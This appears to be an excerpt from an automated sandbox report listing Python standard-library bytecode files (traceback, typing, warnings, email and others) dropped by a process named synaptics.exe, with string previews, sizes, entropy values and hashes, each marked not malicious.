                                                                                                                                                                                                                Preview:o........{-d.i.......................@...sJ...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d8d.d...Z.d.d...Z.d9d.d...Z.d8d.d...Z.d8d.d...Z.d.Z.d.Z.G.d.d...d...Z.e...Z.d.d...Z.e.e.d.d.d.f.d.d...Z.e.e.d.d.f.d.d...Z.e.f.d.d...Z.d.d...Z.d.d...Z.d:d.d ..Z.d;d!d"..Z.d:d#d$..Z.d<d%d&..Z.d9d'd(..Z.d9d)d*..Z.d+d,..Z.G.d-d...d...Z.d/d0..Z.d1d2..Z.d3Z.G.d4d5..d5e ..Z!G.d6d7..d7..Z"d.S.)=z@Extract, format and print information about Python stack traces......N)...extract_stack..extract_tb..format_exception..format_exception_only..format_list..format_stack..format_tb..print_exc..format_exc..print_exception..print_last..print_stack..print_tb..clear_frames..FrameSummary..StackSummary..TracebackException..walk_stack..walk_tbc....................C...s4...|.d.u.r.t.j.}.t...|.......D.].}.t.|.|.d.d.....q.d.S.).zyPrint the list of tuples as returned by extract_tb() or. extract_stack() as a formatted stack trace to the given file.N......file..end)...sys..stderrr......from_list..format..print)...extracted_l
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):9535
                                                                                                                                                                                                                Entropy (8bit):5.143373111420471
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:68BGSXkI30fX7ad5RV7VIPNmXkXFNlO8U2UuLWnxq3juXvypQ1SwDFBL0GSSSOSD:vBGgfioV4NmAFyvWLwx8pOXU/l4r/sV
                                                                                                                                                                                                                MD5:F0F70A91E733670A9CD32D34E2576B44
                                                                                                                                                                                                                SHA1:96407AEF7FF4D61D24D2A4299F4AD2CE5D37D8A5
                                                                                                                                                                                                                SHA-256:8C704DA1334F92A09AEE8FE19D3E926A42E4206048481A0F9107C457EA4F367E
                                                                                                                                                                                                                SHA-512:8EB6D76E3A6639D1FDC4671D61E05320A00C74775F6727CFC2BF5C5EDF23B61F66948AFD98801D8A6588D98A96773E7BE2782D4ADBD2EFAFF64398E62BEEE026
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.(.......................@...s....d.Z.d.d.l.Z.d.d...Z.e.e...Z.e.d.d.....Z.e.e.j...Z.e.e.j...Z.e.e.j...Z.d.d...Z.e.e.....Z.d.d...Z.e.e.....Z.d.d...Z.e...Z.e.e...Z.e.......d.d...Z.e...Z.e.e...Z.G.d.d...d...Z.e.e...j...Z.e.e...Z.e.g.j...Z.e.e.j...Z.e.e...j...Z e.e!j"..Z#e.e$j.d.....Z%e.e...Z&z.e'....e'y.......e..(..d...Z)e.e)..Z*e.e)j+..Z,d.Z)[)Y.n.w.e.e.j...Z-e.e.j...Z/[.[.[.[.[.[.d$d.d...Z0d.d...Z1d%d.d...Z2d.d...Z3G.d.d...d...Z4G.d.d...d...Z5d d!..Z6e.e7e8....Z9e.e8e!B...Z:e.e;..Z<e.d...Z=e.e>..Z?d"d#..e@..D...ZAd.S.)&zO.Define names for built-in types that aren't directly accessible as a builtin.......Nc....................C........d.S...N..r....r....r.....&C:\Users\user\Desktop\tmp\lib\types.py.._f...........r....c....................C...r....r....r....r....r....r....r......<lambda>....r....r....c........................s....d.....f.d.d...}.|.j.d...S.).N.....c........................r....r....r....r........ar....r......f....r....z._cell_factory.<locals>.fr....)...__closur
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):85287
                                                                                                                                                                                                                Entropy (8bit):5.27575073490137
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:DCZtWnoBkc6T6G9TSgukYqUwmM6eOZtTKNtB21bvSF3hCmp9NrT51mWbAyfthIR3:+gR2k3kUNtg1UQmpfb18oc3
                                                                                                                                                                                                                MD5:CBD7F28A11DAB4FEC9E1C09B09BDEF88
                                                                                                                                                                                                                SHA1:050201D3D3EE3F15D4EB53BD6555CF51A8E5CD56
                                                                                                                                                                                                                SHA-256:D627229F1C269B4613090F1E4D8AFE95949858107F6760F9CC8E4AFD5A418761
                                                                                                                                                                                                                SHA-512:13E3373CA56E1A03BB036A04FE55DADF4240DCD96D9C34EC93A8297AE091617591A43A6F4E6AF7EA5718FC742C8782C1B8C7546818F481E03C513285AE5B8251
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.t.......................@...s....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...g.d...Z.d.d.d...d.d...Z.d.d.d...d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.g.Z.d.d.d...d.d...Z.e...f.d d!..Z.G.d"d#..d#..Z G.d$d%..d%..Z!G.d&d'..d'e d.d(..Z"G.d)d*..d*e"d.d(..Z#e"d+d,....Z$e"d-d.....Z%e"d/d0....Z&e"d1d2....Z'e"d3d4....Z(e"d5d6....Z)e#e.d.d...d7d8......Z*e"d9d:....Z+e"d;d<....Z,e"d=d>....Z-G.d?d@..d@e d.d(..Z.G.dAdB..dB..Z/G.dCdD..dDe e!e/d.d(..Z0G.dEdF..dFe e!d.d(..Z1G.dGdH..dHe e!d.d(..Z2G.dIdJ..dJe e!e/d.d(..Z3dKdL..Z4G.dMdN..dNe d.d(..Z5G.dOdP..dPe5d.d(..Z6G.dQdR..dRe5d.d(..Z7G.dSdT..dTe6d.d(..Z8G.dUdV..dVe7d.d(..Z9G.dWdX..dXe7d.d(..Z:G.dYdZ..dZe6d.d(..Z;d[d\..Z<G.d]d^..d^e6d.d(..Z=G.d_d`..d`e6d.d(..Z>G.dadb..db..Z?G.dcdd..dd..Z@G.dedf..df..ZAg.dg..ZBg.dh..ZCeBeC..dig...ZDdjdk..ZEdldm..ZFdndo..ZGd.drds..ZHd.dudv..ZIg.dw..dxdyg.dz..ZJG.d{d|..d|e...ZKG.d}d~..d~e?eKd...ZLG.d.d...d.e6d.d(
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3698
                                                                                                                                                                                                                Entropy (8bit):5.550589438902107
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:i6aByWyhU9ShozDLcLmxESqc0Ic5k4CW36/:i6aByWS2zECW3u4c/
                                                                                                                                                                                                                MD5:5735344BE8490B45DA2158FE04F5DE16
                                                                                                                                                                                                                SHA1:B97ACB771B9170A1158E7474CC9F59CDAAAE94E1
                                                                                                                                                                                                                SHA-256:BF6A21BA8D4498E36E3A9F94FF83C9BCDFDC71A862E6BB38D1D37A00F37B787A
                                                                                                                                                                                                                SHA-512:0612B3AB03F6F91567E378DA4A2D0AD765BF93C7FEDFFC6E178B098C025638658F96D43045028C2B03D030875271EBEC15CCE238327DB9DDA03C5DF00B1A5814
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...sl...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.G.d.d...d.e...Z.d.d.d...d.d...Z.d.d.d...Z.d.d...Z.e.d.k.r4e.....d.S.d.S.).z.Implementation of the UUencode and UUdecode functions...encode(in_file, out_file [,name, mode], *, backtick=False).decode(in_file [, out_file, mode, quiet])......N)...Error..encode..decodec....................@...s....e.Z.d.Z.d.S.).r....N)...__name__..__module__..__qualname__..r....r.....#C:\Users\user\Desktop\tmp\lib\uu.pyr....'...s........r....F....backtickc....................C...sx...g.}.z.|.d.k.r.t.j.j.}.n/t.|.t...r;|.d.u.r.t.j...|...}.|.d.u.r1z.t...|...j.}.W.n...t.y0......Y.n.w.t.|.d...}.|...|.....|.d.k.rDt.j.j.}.n.t.|.t...rSt.|.d...}.|...|.....|.d.u.rYd.}.|.d.u.r_d.}.|...d.d...}.|...d.d...}.|...d.|.d.@.|.f.....d.......|...d...}.t.|...d.k.r.|...t.j.|.|.d.......|...d...}.t.|...d.k.s.|.r.|...d.....n.|...d.....W.|.D.].}.|.......q.d.S.|.D.].}.|.......q.w.).z.Uuencode file..-N..rb..wbi.......z.\n...z.\rz.begin %o %s.i......ascii.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):13656
                                                                                                                                                                                                                Entropy (8bit):5.373478262181229
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:kBo+bmHagj6xo0+q6pRkgm0PN5hltuyFBdMTtwKVv6lx2u4X:kVyHagj6xLD6t/cyFBdMTtJilx2u4X
                                                                                                                                                                                                                MD5:F08C25387B8603CE0ECD30D40E8926F7
                                                                                                                                                                                                                SHA1:8BDCE2349EF2282063DE8345B01AFC3FE7F3B050
                                                                                                                                                                                                                SHA-256:742BAA3549D330290C1DF1B523C4BAB8B4199D19098FDAB2564BCE9ABD68EBBB
                                                                                                                                                                                                                SHA-512:8FF4FE29E295F585749A8BF58B9D29365AAC511072B8F354514AC4B4B049AC5CDD2EEA19132CEFF8C740E94F3F68145C79021B234959165C6E936F2CB3C9D4A3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.O.......................@...s....d.Z.d.d.l.Z.g.d...Z.d=d.d...Z.d>d.d...Z.d.d...Z.d.d...Z.e.Z.d.d...Z.e.Z.d.d...Z.d.e.d.d.d.f.d.d...Z.e.d.d.f.d.d...Z.d.d...Z.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d?d)d*..Z.....d@d+d,..Z.G.d-d...d.e...Z.G.d/d0..d0e...Z.d1d2..Z.z.d.d3l.m.Z.m Z m!Z!m.Z.m.Z.m"Z"..e Z#e!Z$d4Z%W.n...e&y.......g.Z.d5Z#i.Z$d(a'd6d7..Z"d.Z%Y.n.w.e.e.j(....e%s.e)e.d8..s.e.d5e*d9d(d:....e.d;e*d(d<....e.d;e+d(d<....e.d;e,d(d<....e.d;e-d(d<....[%d.S.)Az&Python part of the warnings subsystem......N)...warn..warn_explicit..showwarning..formatwarning..filterwarnings..simplefilter..resetwarnings..catch_warningsc....................C...s....t.|.|.|.|.|.|...}.t.|.....d.S.)..7Hook to write a warning to a file; replace if you like.N)...WarningMessage.._showwarnmsg_impl)...message..category..filename..lineno..file..line..msg..r.....)C:\Users\user\Desktop\tmp\lib\warnings.pyr........s........r....c....................C...s....t.|.|.|.|.d.|...}.t.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):20353
                                                                                                                                                                                                                Entropy (8bit):5.07949148471999
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:MjNLGfZTpG14+ORhWBdAP/+6BWCyljPj8j/sBMpNLRVcNh4oC+erfAh:MpcZE15QhWBdg/+6zyhOpNHS/CXLAh
                                                                                                                                                                                                                MD5:9CDB1AF87E5A777DA6F36201C53ABBD2
                                                                                                                                                                                                                SHA1:915A0FFE16555EF73C4D8A821662BA50DB5839B0
                                                                                                                                                                                                                SHA-256:242727B86961DB7D6FE85756D285AF9192C04D195CE3C3D026062A38E9C6D66C
                                                                                                                                                                                                                SHA-512:C92DF134522D289D84DDBC142F857F034DCD75ECB6323640A000A23C57742307AFD73F210D05040D1B123AE044375A3A7A3C1F9A60F5B5C7353C6BF0C72FDF22
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.V.......................@...s....d.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.e.e.f.Z.g.d...Z.e.j...e.....e.j...e.....G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d...Z.d.S.).z|Weak reference support for Python...This module is an implementation of PEP 205:..https://www.python.org/dev/peps/pep-0205/......)...getweakrefcount..getweakrefs..ref..proxy..CallableProxyType..ProxyType..ReferenceType.._remove_dead_weakref)...WeakSet.._IterationGuardN).r....r....r....r......WeakKeyDictionaryr....r....r......ProxyTypes..WeakValueDictionaryr......WeakMethod..finalizec........................sD...e.Z.d.Z.d.Z.d.Z.d.d.d...Z...f.d.d...Z.d.d...Z.d.d...Z.e.j.Z.....Z.S.).r....z.. A custom `weakref.ref` subclass which simulates a weak reference to. a bound method, working around the lifetime problem of bound methods.. )..._func_ref.._meth_type.._alive..__weakref__Nc........................sx...z.|.j.}.|.j.}.W.n...
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):61045
                                                                                                                                                                                                                Entropy (8bit):5.525487888738165
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:6LXnJeiJWt0b6fx7SYJs5pj8bK5cYTMx/0Btq5Z:EXRWt0ufmTMSBc
                                                                                                                                                                                                                MD5:ABCE5126C64F1AB4541829512A604720
                                                                                                                                                                                                                SHA1:6E7D0FB947D2F2221C6373FD2E8F99647E39A35C
                                                                                                                                                                                                                SHA-256:01C03147530E5AB5536BA0A9776A3B2CDBC71A920291E4F786E81B62C0B67137
                                                                                                                                                                                                                SHA-512:2F20D7D77061B3A321D7D58001EFDF2D9826969EB3F80188922B8745DFDA2FA1D45C8CCAF9F2C133222490199108052A8DD7F26D3AD624E4E6CC1FD018F03F04
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.g.......................@...sD...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.e.j.Z.W.n...e.yQ......d.Z.e.j.Z.Y.n.w.z.d.d.l.Z.W.n...e.yc......d.Z.Y.n.w.z.d.d.l.Z.W.n...e.yu......d.Z.Y.n.w.g.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e...Z.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z d.Z!d.Z"d.Z#d.Z$d.Z%d.Z&d.Z'd.Z(e..)e'..Z*d.Z+d.Z,d.Z-d.Z.d.Z/d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5d.Z6e..)e5..Z7d.Z8d.Z9d.Z:d.Z;d.Z<d.Z=d.Z>d.Z?d.Z@d.ZAd.ZBd.ZCd.ZDd.ZEd.ZFd ZGd!ZHd"ZId#ZJd$ZKd%ZLe..)eK..ZMd.ZNd.ZOd.ZPd.ZQd.ZRd.ZSd.ZTd.ZUd.ZVd.ZWd.ZXd.ZYd&ZZd'Z[e..)eZ..Z\d(Z]d)Z^e..)e]..Z_d.Z`d.Zad.Zbd.Zcd.Zdd.Zed.Zfd.Zgd.Zhd.Zid*Zje..kd+..Zld,d-..Zmd.d/..Znd0d1..Zod2d3..Zpd4d5..ZqG.d6d7..d7er..Zsd.atd8d9..Zud:d;..ZvG.d<d=..d=..ZwG.d>d?..d?..Zxi.d.d@..d.dA..d.dB..d.dB..d.dB..d.dB..d.dC..d.dD..d.dE..d.dF..d.dC..d.dG..d.dH..d#dI..dJdK..dLdM..dNdO..ZydPdQ..ZzdsdRdS..Z{dTdU..Z|G.dVdW..dW..Z}G.dXdY..dY..Z~G.dZd[..d[e.j...Z.G.d\d]..d]e.j...Z.G.d^d_..d_..Z.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):48463
                                                                                                                                                                                                                Entropy (8bit):5.114701832748954
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:pbWU3rQFVpyVRbeFRDRBPou+eQyWIrcabGm/9WQxSNGU4QPFHyaqNuTrjfJQRJrG:lWSAVpyWFRDRBPoJIrcabGm/9WQEN6QF
                                                                                                                                                                                                                MD5:26415ADB436879B47ACBECD638B0A925
                                                                                                                                                                                                                SHA1:25847B624664FE838A50C44B91D994B5C5ECB799
                                                                                                                                                                                                                SHA-256:1D8C5AC013F189C37B3D5342ABC973EBBD024D43D05ABAC50791978D8CCF6638
                                                                                                                                                                                                                SHA-512:FD1A0EA023D63118DE942560D0BB36FE8C17E45A0D9D213D7ED1870A9B8F3D9046C68DF6FB6EF05DF2DA48AFA88972597AA2C0406C1BB0713611F15753EDB8C4
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.yO......Y.n.w.e.j...e.....z.d.d.l.m.Z...W.n...e.yg......Y.n.w.G.d.d...d.e.j ..Z!G.d.d...d.e.j"..Z#G.d.d...d.e.j$..Z%G.d.d...d.e&..Z'G.d.d...d.e(..Z)z.d.d.l.m)Z)..W.n...e.y.......Y.n.w.z.d.d.l.m*Z*..W.n...e.y.......d.d...Z*Y.n.w.d.d.d.d...d.d...Z+d d!..Z,z.d.d"l.m,Z,..W.n...e.y.......Y.n.w.G.d#d$..d$e(..Z-G.d%d&..d&e.j...Z/G.d'd(..d(e.j...Z0G.d)d*..d*e.j...Z1G.d+d,..d,e.j2..Z3d.S.)-a?...This module implements specialized container datatypes providing.alternatives to Python's general purpose built-in containers, dict,.list, set, and tuple...* namedtuple factory function for creating tuple subclasses with named fields.* deque list-like container with fast appends and pops on either end.* ChainMap dict-like class for creating a single view of multiple mappings.* Counter dict subclass
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):248
                                                                                                                                                                                                                Entropy (8bit):4.718941448761525
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:y/0O0teC5VvkFZlaE+MdF/Hj5J+QGuFMntGdgIun:C/8eC7gj+Er+6AGdcn
                                                                                                                                                                                                                MD5:D3D183C7021F109EB22C763F47764450
                                                                                                                                                                                                                SHA1:F8B8BBBB977649EA1A3FF151C83166E86E3894BA
                                                                                                                                                                                                                SHA-256:D1A08B9586F609B734F47A50F9082F4A04A37B3701B16EE69CC5D6663F33AC40
                                                                                                                                                                                                                SHA-512:617EA452AF6FD1844FE917683CE270115202A35F3BFA9CB7059646D1E4DA458D2396466043DD431A1ED8D05BCBE3239FE00BBB5939BB4180FA0A05366EB628DA
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dz........................@...s$...d.d.l.T.d.d.l.m.Z...d.d.l.m.Z...d.S.)......)...*)...__all__)..._CallableGeneriuserasN)..._collections_abcr....r......r....r.....0C:\Users\user\Desktop\tmp\lib\collections\abc.py..<module>....s..........
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1570
                                                                                                                                                                                                                Entropy (8bit):4.883141663205626
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:EwQTrff0h6aHqCZ9EwkaLt/bsTkiC5zHXkUzzt/bih5Nz54t/biuyzOQqt/bijsN:EwQTrfch6OD9tLNookmNs4NMqNP
                                                                                                                                                                                                                MD5:AF68C3800792733B4489ECB9FF2D72DC
                                                                                                                                                                                                                SHA1:F98E6B1489507B4FF0639106995887EDF05772DB
                                                                                                                                                                                                                SHA-256:EB38884F083E60CE92BD199753472EB92E959AB618E44B49625B8F2708CC51BC
                                                                                                                                                                                                                SHA-512:8721450F93083E8A8E45A4528B8315E9C2E8A6F467182E085987A53C3D7632766D221ED88BA9B8175BA2ED2C6C09DB01B294F7FE0C33BDF7C3FFE7867D95B5D2
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d$........................@...s0...d.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z?A package for parsing, handling, and generating email messages.).Z.base64mime..charsetZ.encoders..errorsZ.feedparser..generator..headerZ.iterators..message..message_from_file..message_from_binary_file..message_from_string..message_from_bytesZ.mime..parserZ.quoprimime..utilsc....................O.... ...d.d.l.m.}...|.|.i.|.......|...S.).zvParse a string into a Message object model... Optional _class and strict are passed to the Parser constructor.. .........Parser)...email.parserr....Z.parsestr)...s..args..kwsr......r...../C:\Users\user\Desktop\tmp\lib\email\__init__.pyr.... ............r....c....................O...r....).z|Parse a bytes string into a Message object model... Optional _class and strict are passed to the Parser constructor.. r........BytesParser).r....r....Z.parsebytes).r....r....r....r....r....r....r....r....(...r....r....c....................O...r....).z.Read a
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):5750
                                                                                                                                                                                                                Entropy (8bit):5.413275297315091
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:0OU9w0n6ShN4XpaTzT797ta3T8qCpjjRtfklxvvp/qLfrg8NNOGbM//qH1uqs:mBN0UHy8h7fOvh/WgGN6XqHkqs
                                                                                                                                                                                                                MD5:CD630153B4CD0A1E3966A5D19F7D348B
                                                                                                                                                                                                                SHA1:9457A482F7DCC94CE2A6D1267854914980C80983
                                                                                                                                                                                                                SHA-256:122E5D78E2B54FA6B9239493AC17453F6D268F856FE9F54732899503238C0E56
                                                                                                                                                                                                                SHA-512:E53026FC1FAD619A330C73FBEB4B296464BE54924B93D16C01C1DD618EFA5E68CBAA9FD798DCA9FCA685228CE343CDE49D3652E93F2D4DB0BDCC594EA7A2DD52
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dF".......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...g.d...Z.e...e...d...j.d.d.....Z.d.d...Z.G.d.d...d.e...Z.e...Z.d.e.e.d...<.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.e.d...Z.d.d...Z.e.e.d...Z.e.e.d...Z.d d.d...Z.d.S.)!z. Routines for manipulating RFC2047 encoded words...This is currently a package-private API, but will be considered for promotion.to a public API if there is demand........N)...ascii_letters..digits)...errors)...decode_q..encode_q..decode_b..encode_b..len_q..len_b..decode..encodes....=([a-fA-F0-9]{2})c....................C...s....t...|...d.........S.).N.....)...bytes..fromhex..groupr....)...m..r.....5C:\Users\user\Desktop\tmp\lib\email\_encoded_words.py..<lambda>A...s......r....c....................C...s....|...d.d...}.t.|...g.f.S.).N....._..... )...replace.._q_byte_subber)...encodedr....r....r....r....C...s........r....c....................@...s,...e.Z.d.Z.d.e...d.....e...d.....Z.d.d...Z.d.S.)..._QByteMaps....-
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):12522
                                                                                                                                                                                                                Entropy (8bit):5.364530970770821
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:M8lfofBPanIUGehSKaPvqloJzp9UokTFptf58GxRWc:rlgJMGeMPFp9HkT4G3F
                                                                                                                                                                                                                MD5:4FDD7455757A404FB7101B62DB40454C
                                                                                                                                                                                                                SHA1:323EA591DC1BD716C9806CF1E217F2640240189C
                                                                                                                                                                                                                SHA-256:6E22D5B1769A086B268AC7529373C8567E8C161FA9F17357F7F8E04FE8C0BBA1
                                                                                                                                                                                                                SHA-512:3D32CFF5E01D96676CE52E9BE558B63A65BA3936726FA62025B3D125B8B3E3F960F7D02149F0761D38069AAB7E1A4584B8911B4AB915FAF384E886B29BC7AD19
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.G.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.Z.g.d...Z.g.d...Z.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.S.).zcEmail address parsing code...Lifted directly from rfc822.py. This should eventually be rewritten..)...mktime_tz..parsedate..parsedate_tz..quote.....N.. ..z., ).Z.janZ.febZ.marZ.apr..mayZ.junZ.julZ.aug..sep..octZ.novZ.decZ.januaryZ.februaryZ.marchZ.aprilr....Z.juneZ.julyZ.augustZ.septemberZ.octoberZ.novemberZ.december).Z.monZ.tueZ.wedZ.thuZ.friZ.satZ.sunip...i....i....i....iD...i....).Z.UTZ.UTC..GMT..ZZ.ASTZ.ADTZ.ESTZ.EDTZ.CSTZ.CDTZ.MSTZ.MDTZ.PSTZ.PDTc....................C...s,...t.|...}.|.s.d.S.|.d...d.u.r.d.|.d.<.t.|...S.).zQConvert a date string to a time tuple... Accounts for military timezones.. N.....r....)..._parsedate_tz..tuple)...data..res..r.....1C:\Users\user\Desktop\tmp\lib\email\_parseaddr.pyr....-...s................r....c....................C...s....|.s.d
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):14792
                                                                                                                                                                                                                Entropy (8bit):5.051314833979986
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:nbtx+iovk6H2JvwhY1jaF7AyJAeb7AqDNF/EIRDAysM1Jd/GaOkdlL7+WpSla/AB:nbtLoM6H8vPiJAqVDApM1jeaOMh7G5rl
                                                                                                                                                                                                                MD5:30B6337DA3F88645EF903007828076FC
                                                                                                                                                                                                                SHA1:AE42AF7C478B6248D559CEFF6F7CAE9493157D5B
                                                                                                                                                                                                                SHA-256:4F2EF17773844EE6F9977B79710F7CEF5C36C1216BA0D69A214A2AA9011EFFAB
                                                                                                                                                                                                                SHA-512:DBAEBCCAED122B1B9195F6A6BC419397A710E9E49ED95FD6FA25862D75ED78A21E23C73147FB8930836F2816064E023C980B18A90D952CCBC7EAF6317DFC9E3E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dW<.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.G.d.d...d.e.e.j.d...Z.e.G.d.d...d.e.....Z.e...Z.d.S.).zwPolicy framework for the email package...Allows fine grained feature control of how the package parses and emits data.......N)...header)...charset)..._has_surrogates)...Policy..Compat32..compat32c........................s@...e.Z.d.Z.d.Z...f.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.....Z.S.)..._PolicyBasea....Policy Object basic framework... This class is useless unless subclassed. A subclass should define. class attributes with defaults for any values that are to be. managed by the Policy object. The constructor will then allow. non-default values to be set for these attributes at instance. creation time. The instance will be callable, taking these same. attributes keyword arguments, and returning a new instance. identical to the called instance except for those values changed.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3250
                                                                                                                                                                                                                Entropy (8bit):5.369971911223405
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:XlAnFLYxoMN59tl3kWReNFOsr3n/sMGQHbfuaJg+EtINnig2b4nm+M78ozTho:XOFLsbReNFxr32QSaO+Eiig2gmV78oHu
                                                                                                                                                                                                                MD5:EAACB9DC5172C34FD8DF661557FFE2E5
                                                                                                                                                                                                                SHA1:F481296BCD90B54791576CF7808C819E272B170E
                                                                                                                                                                                                                SHA-256:A9319B5C0E797925C59FBE704DDDD4B180C02CB814D2A944EE65334D26E2750A
                                                                                                                                                                                                                SHA-512:ACA4ACB31E128EF0A7E29393B38A0383CA8DF871643405D697AC735C01D96841617CB53530281344D64E400AC6449C0B2DDA91ED8173E8BFF36C42D47ABD56D0
                                                                                                                                                                                                                Malicious:false
